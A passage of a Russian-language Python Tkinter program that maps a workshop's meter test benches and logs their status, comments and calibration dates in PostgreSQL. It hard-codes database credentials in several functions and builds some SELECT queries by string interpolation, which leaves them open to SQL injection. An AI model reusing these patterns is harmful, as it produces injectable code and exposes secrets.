'red').place(x=10, y=450)\n try:\n #Запись комментария в таблицу БД\n if alarms == 1:\n alarms = 'work'\n elif alarms == 2:\n alarms = 'not_work'\n else:\n alarms = 'is_problems'\n cur = con.cursor()\n \n date = datetime.datetime.now().strftime(\"%d-%m-%Y\")\n time = datetime.datetime.now().strftime(\"%H:%M:%S\") \n author = combo.get()\n comment = text_wr.get(1.0, END).strip()\n cur.execute(\"INSERT INTO public.comments (date, author, commentary, serial_number, time, alarms, number_in_departament) VALUES (%s, %s, %s, %s, %s, %s, %s);\", (date, author, comment, SN, time, alarms, number_in_departament))\n if 'PC' in SN:\n cur.execute(\"UPDATE public.pc SET alarms=%s WHERE name_pc = %s; \", (alarms, SN))\n else: \n cur.execute(\"UPDATE public.installations SET alarms=%s WHERE serial_number = %s; \", (alarms, SN))\n con.commit() \n Label(window_card, text = \"Данные успешно записаны!!!\", foreground = 'green').place(x=10, y=450)\n #Считывание (обновление) данных в поле комментариев\n text_card.delete(1.0, END)\n cur.execute(\"SELECT date, time, author, commentary FROM public.comments WHERE serial_number = \\'%s\\' ORDER BY (date, time);\" %SN)\n rows = cur.fetchall()\n for row in rows:\n text_card.insert(1.0, \"\\nДата: \" + str(row[0]))\n text_card.insert(1.0, \"\\nВремя: \" + str(row[1]))\n text_card.insert(1.0, \"\\nАвтор: \" + row[2])\n text_card.insert(1.0, \"\\nКомментарий: \" + row[3])\n text_card.insert(1.0, \"\\n\")\n con.close()\n except:\n Label(window_card, text = \"Не удалось записать данные в базу данных!!!\", foreground = 'red').place(x=10, y=450)\n \n# Функция записи даты поверки (и других одиночных полей)\ndef SUBD_push_one(window_card, data_bd, SN, number_in_departament, table):\n try:\n # Подключение к БД\n con = psycopg2.connect(\n database=\"Virtual_department\", \n user=\"user\", \n password=\"showmustgoon\", \n host=\"192.168.0.150\", \n port=\"5432\")\n Label(window_card, text = \"Подключение к базе данных: ОК \", foreground = 'green').place(x=10, y=450)\n except:\n Label(window_card, text = \"Подключение к базе данных отсутствует\", foreground = 'red').place(x=10, y=450)\n try:\n #Запись комментария в таблицу БД\n date_usr = data_bd.get(1.0, END).strip()\n if date_usr == \"ГГГГ-ММ-ДД\":\n Label(window_card, text = \"Введите дату\", foreground = 'red').place(x=480, y=270)\n else:\n try:\n date(int(date_usr[0:4]),int(date_usr[5:7]),int(date_usr[8:10]))\n Label(window_card, text = \"Формат ок\", foreground = 'green').place(x=480, y=270)\n cur = con.cursor()\n cur.execute(\"UPDATE public.installations SET poverka_date=%s WHERE serial_number = %s; \", (date_usr, SN))\n con.commit() \n con.close()\n Label(window_card, text = \"Дата записана\", foreground = 'green').place(x=480, y=270)\n except:\n Label(window_card, text = \"Не формат!\", foreground = 'red').place(x=480, y=270)\n \n except:\n Label(window_card, text = \"Не удалось записать данные в базу данных!!!\", foreground = 'red').place(x=10, y=450)\n \n \n# Функция получения данных из базы по установке\ndef SUBD_get(window_card, text_card, SN):\n try:\n # Подключение к БД\n con = psycopg2.connect(\n database=\"Virtual_department\", \n user=\"user\", \n password=\"showmustgoon\", \n host=\"192.168.0.150\", \n port=\"5432\")\n label_dbsuc = Label(window_card, text = \"Подключение к базе данных: ОК\", foreground = 'green')\n label_dbsuc.place(x=10, y=5)\n\n except:\n label_dbsuc = Label(window_card, text = \"Не удалось подключиться к базе денных\", foreground = 'red')\n label_dbsuc.place(x=10, y=5)\n\n try:\n #Считывание данных установки из таблицы установок\n cur = con.cursor()\n cur.execute(\"SELECT serial_number, model, phases, alarms, inkotex, calibrovka, poverka, poverka_date FROM public.installations WHERE serial_number = \\'%s\\';\" %SN)\n rows = cur.fetchall()\n for row in rows:\n Label(window_card, text = (\"Серийный номер: \" + row[0])).place(x=10, y=25)\n Label(window_card, text = (\"Модель стенда: \" + row[1])).place(x=10, y=45)\n Label(window_card, text = (\"Количество фаз: \" + row[2])).place(x=10, y=65)\n if row[3] == 'work':\n Label(window_card, text = (\"Текущее состояние: \" + row[3]), foreground = 'green').place(x=250, y=25)\n elif row[3] == 'not_work':\n Label(window_card, text = (\"Текущее состояние: \" + row[3]), foreground = 'red').place(x=250, y=25)\n elif row[3] == 'is_problems':\n Label(window_card, text = (\"Текущее состояние: \" + row[3]), foreground = 'orange').place(x=250, y=25)\n else:\n Label(window_card, text = (\"Текущее состояние: не удалось получить\"), foreground = 'red').place(x=250, y=25)\n if row[4] == True:\n Label(window_card, text = \"Доработка Инкотекс: имеется\").place(x=250, y=45)\n elif row[4] == False:\n Label(window_card, text = \"Доработка Инкотекс: отсутствует\").place(x=250, y=45)\n else:\n Label(window_card, text = \"Доработка Инкотекс: данные отсутствуют\").place(x=250, y=45)\n Label(window_card, text = (\"Счетчики калибровка: \" + row[5])).place(x=250, y=65)\n Label(window_card, text = (\"Счетчики поверка: \" + row[6])).place(x=250, y=85)\n Label(window_card, text = (\"Дата поверки \\n счетчика: \\n\" + str(row[7]))).place(x=480, y=130)\n except:\n Label(window_card, text = \"Данные в таблице установок отсутсвуют!!!\", foreground = 'red').place(x=10, y=25)\n\n try:\n # Считывание комментариев по данной установке\n cur.execute(\"SELECT date, time, author, commentary FROM public.comments WHERE serial_number = \\'%s\\' ORDER BY (date, time), time;\" %SN)\n rows = cur.fetchall()\n for row in rows:\n text_card.insert(1.0, \"\\nДата: \" + str(row[0]))\n text_card.insert(1.0, \"\\nВремя: \" + str(row[1]))\n text_card.insert(1.0, \"\\nАвтор: \" + row[2])\n text_card.insert(1.0, \"\\nКомментарий: \" + row[3])\n text_card.insert(1.0, \"\\n\")\n con.close()\n except:\n text_card.insert(1.0, \"Данные в таблице комментариев отсутствуют\")\n\ndef button_color(SN, name_pc):\n try:\n con = psycopg2.connect(\n database=\"Virtual_department\", \n user=\"user\", \n password=\"showmustgoon\", \n host=\"192.168.0.150\", \n port=\"5432\")\n cur = con.cursor()\n cur.execute(\"SELECT alarms, (poverka_date - current_date) as poverka_days FROM public.installations WHERE serial_number = \\'%s\\';\" %SN)\n rows = cur.fetchall()\n for row in rows:\n problems = row[0]\n poverka_days = row[1]\n \n if problems == \"work\":\n button_c = ('#D3D3D3')\n elif problems == \"not_work\":\n button_c = ('#FF0000')\n elif problems == \"is_problems\":\n button_c = ('#FFA500')\n else:\n button_c = ('#D3D3D3')\n if poverka_days >= 7:\n poverka_c = 'green'\n elif poverka_days > 0:\n poverka_c = 'orange'\n elif poverka_days <= 0:\n poverka_c = 'red'\n else:\n poverka_c = 'black'\n cur.execute(\"SELECT alarms FROM public.pc WHERE name_pc = \\'%s\\';\" %name_pc)\n rows = cur.fetchall()\n for row in rows:\n problems = row[0]\n if problems == \"work\":\n button_pc = ('#D3D3D3')\n elif problems == \"not_work\":\n button_pc = ('#FF0000')\n elif problems == \"is_problems\":\n button_pc = ('#FFA500')\n else:\n button_pc = ('#D3D3D3')\n con.close()\n return(button_c, poverka_days, poverka_c, button_pc)\n except:\n Label(window, text = \"Не удалось получить данные из базы данных!!!\", bg = 'red').place(x=25, y=760)\n \n\n#Main program\nwindow = Tk() \nwindow.title(\"Виртуальный цех (by Jamigo)\") \nwindow.geometry('1400x800')\n#Включаем подержку нажатий клавиш Ctr-C, Ctr-V, Ctr-X\nwindow.bind_all(\"\", _onKeyRelease, \"+\") \n\n#Дополнительные кнопки \ncommentas = Button(window, text=\"Все комменты\", width = 13, command = lambda: comments('080798', 'ALL'))\ncommentas.place(x=1270, y=20)\nscheme_office_1 = Button(window, text=\"Схема стек.\", width = 13, command = lambda: subprocess.Popen(\"C:\\\\Program Files\\\\OpenOffice 4\\\\program\\\\sdraw.exe D:\\\\myprogram\\\\bin\\\\journal\\\\scheme1.odg\"))\nscheme_office_1.place(x=1270, y=50)\nscheme_office_2 = Button(window, text=\"Схема A2\", width = 13, command = lambda: subprocess.Popen(\"C:\\\\Program Files\\\\OpenOffice 4\\\\program\\\\sdraw.exe D:\\\\myprogram\\\\bin\\\\journal\\\\scheme2.odg\"))\nscheme_office_2.place(x=1270, y=80)\nhistory = Button(window, text=\"Изменения ПО\", width = 13, command = lambda: subprocess.Popen(\"C:\\\\Windows\\\\notepad.exe D:\\\\myprogram\\\\bin\\\\journal\\\\history.txt\"))\nhistory.place(x=1270, y=110)\nprograms = Button(window, text=\"Программы\", width = 13, command = lambda: subprocess.Popen(\"C:\\\\Windows\\\\explorer.exe D:\\\\MyProgram\\\\BIN\\\\dist\"))\nprograms.place(x=1270, y=140)\n\n#Элементы для лучшей визуализации\nRight_wall = Canvas(window, width=10, height=1000, bg = 'green').place(x=1230, y=5)\n\n#Элементы стенда №1 HX-8100 SN 080798\nalarm_color = button_color('080798', 'PC1')\nlbl_HX8100_3 = LabelFrame(window, text = \"1 HX_1ф\")\nlbl_HX8100_3.place(x = 20, y=120, width = 250, heigh = 60)\nHX8100_3_1 = Button(lbl_HX8100_3, text=\"1-48\", width = 10, command = lambda: installation_card('HX8100','080798', '1'), bg = alarm_color[0])\nHX8100_3_1.place(x=10, y=0)\nHX8100_3_2 = Button(lbl_HX8100_3, text=\"49-96\", width = 10, command = lambda: installation_card('HX8100','080798', '1'), bg = alarm_color[0])\nHX8100_3_2.place(x=105, y=0)\nHX8100_3_PC = Button(lbl_HX8100_3, text=\"ПК\", width = 3, command = lambda: PC_card('PC1', '080798', '1'), bg = alarm_color[3])\nHX8100_3_PC.place(x=200, y=0)\nHovertip(HX8100_3_1, ['HX-8100', ' SN080798'])\nHovertip(HX8100_3_2, ['HX-8100', ' SN080798'])\nHovertip(HX8100_3_PC, ['Windows XP', 'IP 192.168.0.202'])\n\n#Элементы стенда №2 HX-8100_2\nalarm_color = button_color('080799', 'PC2')\nlbl_HX8100_2 = LabelFrame(window, text = \"2 HX_1ф\")\nlbl_HX8100_2.place(x = 20, y=280, width = 250, heigh = 60)\nHX8100_2_1 = Button(lbl_HX8100_2, text=\"1-48\", width = 10, command = lambda: installation_card('HX8100', '080799', '2'), bg = alarm_color[0])\nHX8100_2_1.place(x=50, y=0)\nHX8100_2_2 = Button(lbl_HX8100_2, text=\"49-96\", width = 10, command = lambda: installation_card('HX8100', '080799', '2'), bg = alarm_color[0])\nHX8100_2_2.place(x=145, y=0)\nHX8100_2_PC = Button(lbl_HX8100_2, text=\"ПК\", width = 3, command = lambda: PC_card('PC2', '080799', '2'), bg = alarm_color[3])\nHX8100_2_PC.place(x=10, y=0)\nHovertip(HX8100_2_1, ['HX-8100', ' SN080799'])\nHovertip(HX8100_2_2, ['HX-8100', ' SN080799'])\nHovertip(HX8100_2_PC, ['Windows XP', 'IP 192.168.0.163'])\n\n#Элементы стенда №3 SY8125 SN703143\nalarm_color = button_color('703143', 'PC3')\nlbl_SY8125_1 = LabelFrame(window, text = \"3 SY_1ф\")\nlbl_SY8125_1.place(x = 20, y=380, width = 150, heigh = 90)\npoverka_SY8125_1 = Label(lbl_SY8125_1, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8125_1.place(x=45, y=30)\nSY8125_1 = Button(lbl_SY8125_1, text=\"1-24\", width = 15, command = lambda: installation_card('SY8125', '703143', '3'), bg = alarm_color[0])\nSY8125_1.place(x=10, y=0)\nSY8125_1_PC = Button(lbl_SY8125_1, text=\"ПК\", width = 3, command = lambda: PC_card('PC3', '703143', '3'), bg = alarm_color[3])\nSY8125_1_PC.place(x=10, y=30)\nHovertip(SY8125_1, ['SY8125', ' SN703143'])\nHovertip(SY8125_1_PC, ['Windows XP', 'IP 192.168.0.242'])\n\n#Элементы стенда №4 SY8125 SN703146\nalarm_color = button_color('703146', 'PC4')\nlbl_SY8125_2 = LabelFrame(window, text = \"4 SY_1ф\")\nlbl_SY8125_2.place(x = 20, y=470, width = 150, heigh = 90)\npoverka_SY8125_2 = Label(lbl_SY8125_2, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8125_2.place(x=45, y=0)\nSY8125_2 = Button(lbl_SY8125_2, text=\"1-24\", width = 15, command = lambda: installation_card('SY8125', '703146', '4'), bg = alarm_color[0])\nSY8125_2.place(x=10, y=30)\nSY8125_2_PC = Button(lbl_SY8125_2, text=\"ПК\", width = 3, command = lambda: PC_card('PC4', '703146', '4'), bg = alarm_color[3])\nSY8125_2_PC.place(x=10, y=0)\nHovertip(SY8125_2, ['SY8125', ' SN703146'])\nHovertip(SY8125_2_PC, ['Windows XP', 'IP 192.168.0.97'])\n\n#Элементы стенда №5 УАПС-1М SN000000\nalarm_color = button_color('000000', 'PC5')\nlbl_UAPS1M_5 = LabelFrame(window, text = \"5 УАПС\")\nlbl_UAPS1M_5.place(x = 270, y=0, width = 80, heigh = 85)\nUAPS1M_5 = Button(lbl_UAPS1M_5, text=\"Уст.\", width = 3, command = lambda: installation_card('UAPS-1M', '000000', '5'), bg = alarm_color[0])\nUAPS1M_5.place(x=20, y=00)\nUAPS1M_5_1 = Button(lbl_UAPS1M_5, text=\"1-6\", width = 3, command = lambda: installation_card('UAPS-1M', '000000', '5'), bg = alarm_color[0])\nUAPS1M_5_1.place(x=40, y=30)\nHovertip(UAPS1M_5, ['УАПС-1М', ' SN000000'])\nHovertip(UAPS1M_5_1, ['УАПС-1М', ' SN000000'])\n\n#Элементы стенда №6 УАПС-1М SN102\nalarm_color = button_color('102', 'PC6')\nlbl_UAPS1M_6 = LabelFrame(window, text = \"6 УАПС\")\nlbl_UAPS1M_6.place(x = 350, y=0, width = 80, heigh = 85)\nUAPS1M_6 = Button(lbl_UAPS1M_6, text=\"Уст.\", width = 3, command = lambda: installation_card('UAPS-1M', '102', '6'), bg = alarm_color[0])\nUAPS1M_6.place(x=20, y=00)\nUAPS1M_6_1 = Button(lbl_UAPS1M_6, text=\"1-6\", width = 3, command = lambda: installation_card('UAPS-1M', '102', '6'), bg = alarm_color[0])\nUAPS1M_6_1.place(x=40, y=30)\nUAPS1M_6_PC = Button(lbl_UAPS1M_6, text=\"ПК\", width = 3, command = lambda: PC_card('PC6', '102', '6'), bg = alarm_color[3])\nUAPS1M_6_PC.place(x=0, y=30)\nHovertip(UAPS1M_6, ['УАПС-1М', 'SN102'])\nHovertip(UAPS1M_6_1, ['УАПС-1М', 'SN102'])\nHovertip(UAPS1M_6_PC, ['Windows XP', 'IP 192.168.0.169'])\n\n#Элементы стенда №7 УАПС-1М SN61207\nalarm_color = button_color('61207', 'PC7')\nlbl_UAPS1M_7 = LabelFrame(window, text = \"7 УАПС\")\nlbl_UAPS1M_7.place(x = 440, y=0, width = 80, heigh = 85)\nUAPS1M_7 = Button(lbl_UAPS1M_7, text=\"Уст.\", width = 3, command = lambda: installation_card('UAPS-1M', '61207', '7'), bg = alarm_color[0])\nUAPS1M_7.place(x=20, y=00)\nUAPS1M_7_1 = Button(lbl_UAPS1M_7, text=\"1-6\", width = 3, command = lambda: installation_card('UAPS-1M', '61207', '7'), bg = alarm_color[0])\nUAPS1M_7_1.place(x=40, y=30)\nUAPS1M_7_PC = Button(lbl_UAPS1M_7, text=\"ПК\", width = 3, command = lambda: PC_card('PC7', '61207', '7'), bg = alarm_color[3])\nUAPS1M_7_PC.place(x=0, y=30)\nHovertip(UAPS1M_7, ['УАПС-1М', 'SN61207'])\nHovertip(UAPS1M_7_1, ['УАПС-1М', 'SN61207'])\nHovertip(UAPS1M_7_PC, ['Windows XP', 'IP 192.168.0.37'])\n\n#Элементы стенда №8 УАПС-1М SN109\nalarm_color = button_color('109', 'PC8')\nlbl_UAPS1M_8 = LabelFrame(window, text = \"8 УАПС\")\nlbl_UAPS1M_8.place(x = 640, y=0, width = 80, heigh = 85)\nUAPS1M_8 = Button(lbl_UAPS1M_8, text=\"Уст.\", width = 3, command = lambda: installation_card('UAPS-1M', '109', '8'), bg = alarm_color[0])\nUAPS1M_8.place(x=20, y=00)\nUAPS1M_8_1 = Button(lbl_UAPS1M_8, text=\"1-6\", width = 3, command = lambda: installation_card('UAPS-1M', '109', '8'), bg = alarm_color[0])\nUAPS1M_8_1.place(x=40, y=30)\nUAPS1M_8_PC = Button(lbl_UAPS1M_8, text=\"ПК\", width = 3, command = lambda: PC_card('PC8', '109', '8'), bg = alarm_color[3])\nUAPS1M_8_PC.place(x=0, y=30)\nHovertip(UAPS1M_8, ['УАПС-1М', 'SN109'])\nHovertip(UAPS1M_8_1, ['УАПС-1М', 'SN109'])\nHovertip(UAPS1M_8_PC, ['Windows 98', 'IP 192.168.0.17'])\n\n#Элементы стенда №9 УАПС-1М SN050908\nalarm_color = button_color('050908', 'PC9')\nlbl_UAPS1M_9 = LabelFrame(window, text = \"9 УАПС\")\nlbl_UAPS1M_9.place(x = 730, y=0, width = 80, heigh = 85)\nUAPS1M_9 = Button(lbl_UAPS1M_9, text=\"Уст.\", width = 3, command = lambda: installation_card('UAPS-1M', '050908', '9'), bg = alarm_color[0])\nUAPS1M_9.place(x=20, y=00)\nUAPS1M_9_1 = Button(lbl_UAPS1M_9, text=\"1-6\", width = 3, command = lambda: installation_card('UAPS-1M', '050908', '9'), bg = alarm_color[0])\nUAPS1M_9_1.place(x=40, y=30)\nUAPS1M_9_PC = Button(lbl_UAPS1M_9, text=\"ПК\", width = 3, command = lambda: PC_card('PC9', '050908', '9'), bg = alarm_color[3])\nUAPS1M_9_PC.place(x=0, y=30)\nHovertip(UAPS1M_9, ['УАПС-1М', 'SN050908'])\nHovertip(UAPS1M_9_1, ['УАПС-1М', 'SN050908'])\nHovertip(UAPS1M_9_PC, ['Windows XP', 'IP 192.168.0.40'])\n\n#Элементы стенда №10 HX8300 SN0807102\nalarm_color = button_color('0807102', 'PC10')\nlbl_HX8300_10 = LabelFrame(window, text = \"10 HX_3ф\")\nlbl_HX8300_10.place(x = 350, y=120, width = 50, heigh = 320)\nHX8300_10_1 = Button(lbl_HX8300_10, text=\"1-\\n24\", width = 3, height = 3, command = lambda: installation_card('HX8300','0807102', '10'), bg = alarm_color[0])\nHX8300_10_1.place(x=5, y=30)\nHX8300_10_2 = Button(lbl_HX8300_10, text=\"25-\\n48\", width = 3, height = 3, command = lambda: installation_card('HX8300','0807102', '10'), bg = alarm_color[0])\nHX8300_10_2.place(x=5, y=95)\nHX8300_10_3 = Button(lbl_HX8300_10, text=\"49-\\n72\", width = 3, height = 3, command = lambda: installation_card('HX8300','0807102', '10'), bg = alarm_color[0])\nHX8300_10_3.place(x=5, y=160)\nHX8300_10_4 = Button(lbl_HX8300_10, text=\"73-\\n96\", width = 3, height = 3, command = lambda: installation_card('HX8300','0807102', '10'), bg = alarm_color[0])\nHX8300_10_4.place(x=5, y=225)\nHX8300_10_PC = Button(lbl_HX8300_10, text=\"ПК\", width = 3, command = lambda: PC_card('PC10','0807102', '10'), bg = alarm_color[3])\nHX8300_10_PC.place(x=5, y=0)\nHovertip(HX8300_10_1, ['HX-8300', ' SN0807102'])\nHovertip(HX8300_10_2, ['HX-8300', ' SN0807102'])\nHovertip(HX8300_10_3, ['HX-8300', ' SN0807102'])\nHovertip(HX8300_10_4, ['HX-8300', ' SN0807102'])\nHovertip(HX8300_10_PC, ['Windows 7', 'IP 192.168.0.43'])\n\n#Элементы стенда №11 HX8300 SN0807103\nalarm_color = button_color('0807103', 'PC11')\nlbl_HX8300_11 = LabelFrame(window, text = \"11 HX_3ф\")\nlbl_HX8300_11.place(x = 350, y=440, width = 50, heigh = 320)\nHX8300_11_1 = Button(lbl_HX8300_11, text=\"1-\\n24\", width = 3, height = 3, command = lambda: installation_card('HX8300','0807103', '11'), bg = alarm_color[0])\nHX8300_11_1.place(x=5, y=30)\nHX8300_11_2 = Button(lbl_HX8300_11, text=\"25-\\n48\", width = 3, height = 3, command = lambda: installation_card('HX8300','0807103', '11'), bg = alarm_color[0])\nHX8300_11_2.place(x=5, y=95)\nHX8300_11_3 = Button(lbl_HX8300_11, text=\"49-\\n72\", width = 3, height = 3, command = lambda: installation_card('HX8300','0807103', '11'), bg = alarm_color[0])\nHX8300_11_3.place(x=5, y=160)\nHX8300_11_4 = Button(lbl_HX8300_11, text=\"73-\\n96\", width = 3, height = 3, command = lambda: installation_card('HX8300','0807103', '11'), bg = alarm_color[0])\nHX8300_11_4.place(x=5, y=225)\nHX8300_11_PC = Button(lbl_HX8300_11, text=\"ПК\", width = 3, command = lambda: PC_card('PC11','0807103', '11'), bg = alarm_color[3])\nHX8300_11_PC.place(x=5, y=0)\nHovertip(HX8300_11_1, ['HX-8300', ' SN0807103'])\nHovertip(HX8300_11_2, ['HX-8300', ' SN0807103'])\nHovertip(HX8300_11_3, ['HX-8300', ' SN0807103'])\nHovertip(HX8300_11_4, ['HX-8300', ' SN0807103'])\nHovertip(HX8300_11_PC, ['Windows XP', 'IP нет данных'])\n\n#Элементы стенда №12 CL3005-24 SN3028\nalarm_color = button_color('3028', 'PC12')\nlbl_CL3005_1 = LabelFrame(window, text = \"12 CL_3ф\")\nlbl_CL3005_1.place(x = 420, y=100, width = 250, heigh = 90)\npoverka_CL3005_1 = Label(lbl_CL3005_1, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL3005_1.place(x=10, y=10)\nCL3005_1_1 = Button(lbl_CL3005_1, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005-24','3028', '12'), bg = alarm_color[0])\nCL3005_1_1.place(x=10, y=30)\nCL3005_1_2 = Button(lbl_CL3005_1, text=\"13-24\", width = 10, command = lambda: installation_card('CL3005-24','3028', '12'), bg = alarm_color[0])\nCL3005_1_2.place(x=105, y=30)\nCL3005_1_ST = Button(lbl_CL3005_1, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005-24','3028', '12'), bg = alarm_color[0])\nCL3005_1_ST.place(x=200, y=30)\nCL3005_1_PC = Button(lbl_CL3005_1, text=\"ПК\", width = 3, command = lambda: PC_card('PC12','3028', '12'), bg = alarm_color[3])\nCL3005_1_PC.place(x=200, y=0)\nHovertip(CL3005_1_1, ['CL3005-24', ' SN3028'])\nHovertip(CL3005_1_2, ['CL3005-24', ' SN3028'])\nHovertip(CL3005_1_ST, ['CL3005-24', ' SN3028'])\nHovertip(CL3005_1_PC, ['Windows 7', 'IP 192.168.0.185'])\n\n#Элементы стенда №13 CL3005-24 SN3042\nalarm_color = button_color('3042', 'PC13')\nlbl_CL3005_2 = LabelFrame(window, text = \"13 CL_3ф\")\nlbl_CL3005_2.place(x = 670, y=100, width = 250, heigh = 90)\npoverka_CL3005_2 = Label(lbl_CL3005_2, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL3005_2.place(x=10, y=10)\nCL3005_2_1 = Button(lbl_CL3005_2, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005-24','3042', '13'), bg = alarm_color[0])\nCL3005_2_1.place(x=10, y=30)\nCL3005_2_2 = Button(lbl_CL3005_2, text=\"13-24\", width = 10, command = lambda: installation_card('CL3005-24','3042', '13'), bg = alarm_color[0])\nCL3005_2_2.place(x=105, y=30)\nCL3005_2_ST = Button(lbl_CL3005_2, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005-24','3042', '13'), bg = alarm_color[0])\nCL3005_2_ST.place(x=200, y=30)\nCL3005_2_PC = Button(lbl_CL3005_2, text=\"ПК\", width = 3, command = lambda: PC_card('PC13','3042', '13'), bg = alarm_color[3])\nCL3005_2_PC.place(x=200, y=0)\nHovertip(CL3005_2_1, ['CL3005-24', ' SN3042'])\nHovertip(CL3005_2_1, ['CL3005-24', ' SN3042'])\nHovertip(CL3005_2_ST, ['CL3005-24', ' SN3042'])\nHovertip(CL3005_2_PC, ['Windows 7', 'IP 192.168.0.253'])\n\n#Элементы стенда №14 CL1001 SN1009\nalarm_color = button_color('1009', 'PC14')\nlbl_CL1001_1 = LabelFrame(window, text = \"14 CL_1ф\")\nlbl_CL1001_1.place(x = 450, y=190, width = 150, heigh = 90)\npoverka_CL1001_1 = Label(lbl_CL1001_1, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL1001_1.place(x=45, y=30)\nCL1001_1_1 = Button(lbl_CL1001_1, text=\"1-24\", width = 10, command = lambda: installation_card('CL1001','1009', '14'), bg = alarm_color[0])\nCL1001_1_1.place(x=50, y=0)\nCL1001_1_ST = Button(lbl_CL1001_1, text=\"Уст.\", width = 3, command = lambda: installation_card('CL1001','1009', '14'), bg = alarm_color[0])\nCL1001_1_ST.place(x=10, y=0)\nCL1001_1_PC = Button(lbl_CL1001_1, text=\"ПК\", width = 3, command = lambda: PC_card('PC14','1009', '14'), bg = alarm_color[3])\nCL1001_1_PC.place(x=10, y=30)\nHovertip(CL1001_1_1, ['CL3005-24', ' SN1009'])\nHovertip(CL1001_1_ST, ['CL3005-24', ' SN1009'])\nHovertip(CL1001_1_PC, ['Windows XP', 'IP 192.168.0.201'])\n\n#Элементы стенда №15 CL1001 SN1008\nalarm_color = button_color('1008', 'PC15')\nlbl_CL1001_2 = LabelFrame(window, text = \"15 CL_1ф\")\nlbl_CL1001_2.place(x = 450, y=280, width = 150, heigh = 90)\npoverka_CL1001_2 = Label(lbl_CL1001_2, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL1001_2.place(x=10, y=10)\nCL1001_2_1 = Button(lbl_CL1001_2, text=\"1-24\", width = 10, command = lambda: installation_card('CL1001','1008', '15'), bg = alarm_color[0])\nCL1001_2_1.place(x=10, y=30)\nCL1001_2_ST = Button(lbl_CL1001_2, text=\"Уст.\", width = 3, command = lambda: installation_card('CL1001','1008', '15'), bg = alarm_color[0])\nCL1001_2_ST.place(x=110, y=30)\nCL1001_2_PC = Button(lbl_CL1001_2, text=\"ПК\", width = 3, command = lambda: PC_card('PC15','1008', '15'), bg = alarm_color[3])\nCL1001_2_PC.place(x=110, y=0)\nHovertip(CL1001_2_1, ['CL3005-24', ' SN1008'])\nHovertip(CL1001_2_ST, ['CL3005-24', ' SN1008'])\nHovertip(CL1001_2_PC, ['Windows XP', 'IP 192.168.0.47'])\n\n#Элементы стенда №16 SY8125 SN703154\nalarm_color = button_color('703154', 'PC16')\nlbl_SY8125_3 = LabelFrame(window, text = \"16 SY_1ф\")\nlbl_SY8125_3.place(x = 605, y=190, width = 150, heigh = 80)\npoverka_SY8125_3 = Label(lbl_SY8125_3, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8125_3.place(x=0, y=30)\nSY8125_3 = Button(lbl_SY8125_3, text=\"1-24\", width = 10, command = lambda: installation_card('SY8125', '703154', '16'), bg = alarm_color[0])\nSY8125_3.place(x=50, y=0)\nSY8125_3_PC = Button(lbl_SY8125_3, text=\"ПК\", width = 3, command = lambda: PC_card('PC16', '703154', '16'), bg = alarm_color[3])\nSY8125_3_PC.place(x=10, y=0)\nHovertip(SY8125_3, ['SY8125', ' SN703154'])\nHovertip(SY8125_3_PC, ['Windows XP', 'IP 192.168.0.155'])\n\n#Элементы стенда №17 SY8125 SN703152\nalarm_color = button_color('703152', 'PC17')\nlbl_SY8125_4 = LabelFrame(window, text = \"17 SY_1ф\")\nlbl_SY8125_4.place(x = 760, y=190, width = 150, heigh = 80)\npoverka_SY8125_4 = Label(lbl_SY8125_4, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8125_4.place(x=0, y=30)\nSY8125_4 = Button(lbl_SY8125_4, text=\"1-24\", width = 10, command = lambda: installation_card('SY8125', '703152', '17'), bg = alarm_color[0])\nSY8125_4.place(x=50, y=0)\nSY8125_4_PC = Button(lbl_SY8125_4, text=\"ПК\", width = 3, command = lambda: PC_card('PC17', '703152', '17'), bg = alarm_color[3])\nSY8125_4_PC.place(x=10, y=0)\nHovertip(SY8125_4, ['SY8125', ' SN703152'])\nHovertip(SY8125_4_PC, ['Windows XP', 'IP 192.168.0.12'])\n\n#Элементы стенда №18 SY8125 SN703153\nalarm_color = button_color('703153', 'PC18')\nlbl_SY8125_5 = LabelFrame(window, text = \"18 SY_1ф\")\nlbl_SY8125_5.place(x = 605, y=285, width = 150, heigh = 85)\npoverka_SY8125_5 = Label(lbl_SY8125_5, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8125_5.place(x=50, y=10)\nSY8125_5 = Button(lbl_SY8125_5, text=\"1-24\", width = 10, command = lambda: installation_card('SY8125', '703153', '18'), bg = alarm_color[0])\nSY8125_5.place(x=50, y=30)\nSY8125_5_PC = Button(lbl_SY8125_5, text=\"ПК\", width = 3, command = lambda: PC_card('PC18', '703153', '18'), bg = alarm_color[3])\nSY8125_5_PC.place(x=10, y=30)\nHovertip(SY8125_5, ['SY8125', ' SN703153'])\nHovertip(SY8125_5_PC, ['Windows XP', 'IP 192.168.0.113'])\n\n#Элементы стенда №19 SY8125 SN703151\nalarm_color = button_color('703151', 'PC19')\nlbl_SY8125_6 = LabelFrame(window, text = \"19 SY_1ф\")\nlbl_SY8125_6.place(x = 760, y=285, width = 150, heigh = 85)\npoverka_SY8125_6 = Label(lbl_SY8125_6, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8125_6.place(x=50, y=10)\nSY8125_6 = Button(lbl_SY8125_6, text=\"1-24\", width = 10, command = lambda: installation_card('SY8125', '703151', '19'), bg = alarm_color[0])\nSY8125_6.place(x=10, y=30)\nSY8125_6_PC = Button(lbl_SY8125_6, text=\"ПК\", width = 3, command = lambda: PC_card('PC19', '703151', '19'), bg = alarm_color[3])\nSY8125_6_PC.place(x=105, y=30)\nHovertip(SY8125_5, ['SY8125', ' SN703151'])\nHovertip(SY8125_5_PC, ['Windows XP', 'IP 192.168.0.134'])\n\n#Элементы стенда №20 CL3005-24 SN3035\nalarm_color = button_color('3035', 'PC20')\nlbl_CL3005_3 = LabelFrame(window, text = \"20 CL_3ф\")\nlbl_CL3005_3.place(x = 